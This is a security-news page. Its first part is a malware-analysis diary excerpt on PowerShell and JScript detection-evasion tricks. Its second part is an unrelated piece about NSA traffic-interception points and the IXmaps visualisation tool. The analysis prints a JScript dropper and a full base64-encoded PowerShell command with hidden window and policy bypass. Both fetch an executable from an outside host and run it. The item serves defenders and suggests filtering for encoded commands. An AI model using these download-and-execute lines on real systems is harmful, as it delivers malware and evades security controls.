Information Security News
var d = new ActiveXObject("Shell.NormandApplication".replace("Normand", ""));
d.ShellExecute("PowerShell", "(New-Object System.Net.WebClient).DownloadFile('http://[redacted].exe', 'xwing.pif'); Start-Process 'xwing.pif'",
There is no real obfuscation here, just a trick to avoid detection of the string "Shell.Application", which is often searched for by automated tools.
Sometimes, there is no need to implement complex code to bypass detection. A good example comes with PowerShell, which accepts the following command line:

poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAGkARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBhAHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUwBjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g
The decoded command (base64 of a UTF-16LE string) is:

(nEw-objecT SySTem.Net.WEbCliENt).DowNLoaDFIlE( ”https://[redacted]/images/Scan_2.exe” , ”$env:TEmP\output.exe” ) ; inVokE-ExPResSIoN ”$ENv:tEMP\output.exe”
Nothing fancy and easy to decode, but this trick will bypass most default security controls. A good idea is to fine-tune your regular expressions and filters to catch the -encodedcommand string (and ignore the case).
Note that the PE file is downloaded via HTTPS!
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
by Sebastian Anthony
A couple of years ago, when I was investigating the UK's safest ISP, a high-ranking employee at Virgin Media told me there was no NSA or GCHQ Internet traffic interception equipment hiding within Virgin's network. He also said that, in his opinion, not much traffic interception actually occurs in the UK. I asked him why. "Because they don't need to. They'll get your data when it lands in the US."
While it's not true that all Internet traffic flows through the US, the addition of a few listening posts at key Internet exchanges in Europe (London, Paris) and some in Asia (Hong Kong, Tokyo) ensures that the NSA and its Five Eyes partners can analyse and ingest the majority of international Internet traffic.
To visualise the extent of the NSA's surveillance network, IXmaps has created a tool that shows you the location of suspected Internet traffic interception points. You can input your own traceroute data, or if you're in a rush you can just bring up traceroute data from people living in the same city or using the same ISP. Then click the "layers" button and turn on NSA, AT&T/Fairview, and Verizon/Stormbrew.